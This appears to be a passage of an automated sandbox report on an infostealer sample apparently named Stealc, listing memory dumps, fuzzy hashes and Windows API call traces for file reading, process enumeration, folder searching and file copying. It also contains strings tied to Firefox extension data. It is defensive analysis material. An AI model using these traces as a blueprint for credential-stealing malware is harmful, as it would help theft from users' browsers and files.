                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 211194620-0
                                                                                                                                                                            • Opcode ID: 4e9d73d7e3d4ddaef86a783bd2351213dbb743c43cd05a6cfb0137e4787782a4
                                                                                                                                                                            • Instruction ID: 422ee2d343ed7160fb8f904315f5d5a7cb8bc3a657b012bdf1fe3938836eda2a
                                                                                                                                                                            • Opcode Fuzzy Hash: 4e9d73d7e3d4ddaef86a783bd2351213dbb743c43cd05a6cfb0137e4787782a4
                                                                                                                                                                            • Instruction Fuzzy Hash: A4811271950108EBEF05FBA4DD9ADEE7378AF14300F50416AF506A6091EF3C6A09DB72
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0078A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0078A7E6
                                                                                                                                                                              • Part of subcall function 007799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007799EC
                                                                                                                                                                              • Part of subcall function 007799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00779A11
                                                                                                                                                                              • Part of subcall function 007799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00779A31
                                                                                                                                                                              • Part of subcall function 007799C0: ReadFile.KERNEL32(000000FF,?,00000000,007802E7,00000000), ref: 00779A5A
                                                                                                                                                                              • Part of subcall function 007799C0: LocalFree.KERNEL32(007802E7), ref: 00779A90
                                                                                                                                                                              • Part of subcall function 007799C0: CloseHandle.KERNEL32(000000FF), ref: 00779A9A
                                                                                                                                                                              • Part of subcall function 00788E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00788E52
                                                                                                                                                                              • Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12
                                                                                                                                                                              • Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905
                                                                                                                                                                              • Part of subcall function 0078A920: lstrcpy.KERNEL32(00000000,?), ref: 0078A972
                                                                                                                                                                              • Part of subcall function 0078A920: lstrcatA.KERNEL32(00000000), ref: 0078A982
                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00791580,00790D92), ref: 0077F54C
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0077F56B
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                                                                                                                                                            • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                                                                                                            • API String ID: 998311485-3310892237
                                                                                                                                                                            • Opcode ID: cf1b18f705a585ac9d105fcd7f5d4b8635c6d972b6dadf5dd0ad220c79e6f1b1
                                                                                                                                                                            • Instruction ID: beb4bd1cf92282253da7351102e492c75f76edf082c418a6f30459ad1637f315
                                                                                                                                                                            • Opcode Fuzzy Hash: cf1b18f705a585ac9d105fcd7f5d4b8635c6d972b6dadf5dd0ad220c79e6f1b1
                                                                                                                                                                            • Instruction Fuzzy Hash: 1351F071D50108FAEF05FBA4DC9ADED7378AF54300F408529F816A7191EE3C6A19CBA2
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788
                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,007905B7), ref: 007886CA
                                                                                                                                                                            • Process32First.KERNEL32(?,00000128), ref: 007886DE
                                                                                                                                                                            • Process32Next.KERNEL32(?,00000128), ref: 007886F3
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12
                                                                                                                                                                              • Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905
                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00788761
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1066202413-0
                                                                                                                                                                            • Opcode ID: a41a748dc4c70764af752c4756549065d587ff9f8b226566e71ec5254fccc2b3
                                                                                                                                                                            • Instruction ID: 63865b9e2a2fd30b41c0d649e90413000b7c4a04226df1e268b631b2115e3933
                                                                                                                                                                            • Opcode Fuzzy Hash: a41a748dc4c70764af752c4756549065d587ff9f8b226566e71ec5254fccc2b3
                                                                                                                                                                            • Instruction Fuzzy Hash: 0A318F71951218EBDB24EF91DC45FEEB778EB04700F1042AAE109A21A0DF386E45CFA2
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00788DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00788E0B
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00784F7A
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00791070), ref: 00784F97
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00CFDA18), ref: 00784FAB
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00791074), ref: 00784FBD
                                                                                                                                                                              • Part of subcall function 00784910: wsprintfA.USER32 ref: 0078492C
                                                                                                                                                                              • Part of subcall function 00784910: FindFirstFileA.KERNEL32(?,?), ref: 00784943
                                                                                                                                                                              • Part of subcall function 00784910: StrCmpCA.SHLWAPI(?,00790FDC), ref: 00784971
                                                                                                                                                                              • Part of subcall function 00784910: StrCmpCA.SHLWAPI(?,00790FE0), ref: 00784987
                                                                                                                                                                              • Part of subcall function 00784910: FindNextFileA.KERNEL32(000000FF,?), ref: 00784B7D
                                                                                                                                                                              • Part of subcall function 00784910: FindClose.KERNEL32(000000FF), ref: 00784B92
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2667927680-0
                                                                                                                                                                            • Opcode ID: f1c051f188b2a0f639c439a5321dd6192891c3a50c5559a916e9435396a6b652
                                                                                                                                                                            • Instruction ID: 4dd55b4e534c70ef128fbac52e36736a29b090304bbb9faf898433ded39618cb
                                                                                                                                                                            • Opcode Fuzzy Hash: f1c051f188b2a0f639c439a5321dd6192891c3a50c5559a916e9435396a6b652
                                                                                                                                                                            • Instruction Fuzzy Hash: 6921DDB6954204ABCB54F770ED4AEED337CA754300F404694B64952181EEBDABC88BA3
                                                                                                                                                                            APIs
                                                                                                                                                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00CF1620,?,0079110C,?,00000000,?,00791110,?,00000000,00790AEF), ref: 00786ACA
                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00786AE8
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00786AF9
                                                                                                                                                                            • Sleep.KERNEL32(00001770), ref: 00786B04
                                                                                                                                                                            • CloseHandle.KERNEL32(?,00000000,?,00CF1620,?,0079110C,?,00000000,?,00791110,?,00000000,00790AEF), ref: 00786B1A
                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00786B22
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 941982115-0
                                                                                                                                                                            • Opcode ID: 0453f5b1f101ea299e01007dbde4720f116050ef9f172950dfa2c2e1940a1008
                                                                                                                                                                            • Instruction ID: 88e200cffbed426ee345b8f3054eebb48360f271fdc990e0ba4244824cbda4ce
                                                                                                                                                                            • Opcode Fuzzy Hash: 0453f5b1f101ea299e01007dbde4720f116050ef9f172950dfa2c2e1940a1008
                                                                                                                                                                            • Instruction Fuzzy Hash: 0FF03AB0988209FAE700BBA09D4ABBD7B34EB04701F208615B512A11C1DBB95940E757
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: `ow
                                                                                                                                                                            • API String ID: 0-2610069957
                                                                                                                                                                            • Opcode ID: 2a59147b4a8115d19dbce6a77ad54bf570b90a9ad14a93a1ad6548dd4a5f11b7
                                                                                                                                                                            • Instruction ID: 31be4139ae9a9620a1fe30db355814e424ef380b65049646c295db26da8622c5
                                                                                                                                                                            • Opcode Fuzzy Hash: 2a59147b4a8115d19dbce6a77ad54bf570b90a9ad14a93a1ad6548dd4a5f11b7
                                                                                                                                                                            • Instruction Fuzzy Hash: 0E6108B4A00618DFCF14DF94E988BEEB7B0BB04344F108598E41967289D779AF94DF91
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00788DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00788E0B
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00784BEA
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00D00000), ref: 00784C08
                                                                                                                                                                              • Part of subcall function 00784910: wsprintfA.USER32 ref: 0078492C
                                                                                                                                                                              • Part of subcall function 00784910: FindFirstFileA.KERNEL32(?,?), ref: 00784943
                                                                                                                                                                              • Part of subcall function 00784910: StrCmpCA.SHLWAPI(?,00790FDC), ref: 00784971
                                                                                                                                                                              • Part of subcall function 00784910: StrCmpCA.SHLWAPI(?,00790FE0), ref: 00784987
                                                                                                                                                                              • Part of subcall function 00784910: FindNextFileA.KERNEL32(000000FF,?), ref: 00784B7D
                                                                                                                                                                              • Part of subcall function 00784910: FindClose.KERNEL32(000000FF), ref: 00784B92
                                                                                                                                                                              • Part of subcall function 00784910: wsprintfA.USER32 ref: 007849B0
                                                                                                                                                                              • Part of subcall function 00784910: StrCmpCA.SHLWAPI(?,007908D2), ref: 007849C5
                                                                                                                                                                              • Part of subcall function 00784910: wsprintfA.USER32 ref: 007849E2
                                                                                                                                                                              • Part of subcall function 00784910: PathMatchSpecA.SHLWAPI(?,?), ref: 00784A1E
                                                                                                                                                                              • Part of subcall function 00784910: lstrcatA.KERNEL32(?,00CFD8E8,?,000003E8), ref: 00784A4A
                                                                                                                                                                              • Part of subcall function 00784910: lstrcatA.KERNEL32(?,00790FF8), ref: 00784A5C
                                                                                                                                                                              • Part of subcall function 00784910: lstrcatA.KERNEL32(?,?), ref: 00784A70
                                                                                                                                                                              • Part of subcall function 00784910: lstrcatA.KERNEL32(?,00790FFC), ref: 00784A82
                                                                                                                                                                              • Part of subcall function 00784910: lstrcatA.KERNEL32(?,?), ref: 00784A96
                                                                                                                                                                              • Part of subcall function 00784910: CopyFileA.KERNEL32(?,?,00000001), ref: 00784AAC
                                                                                                                                                                              • Part of subcall function 00784910: DeleteFileA.KERNEL32(?), ref: 00784B31
                                                                                                                                                                              • Part of subcall function 00784910: wsprintfA.USER32 ref: 00784A07
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
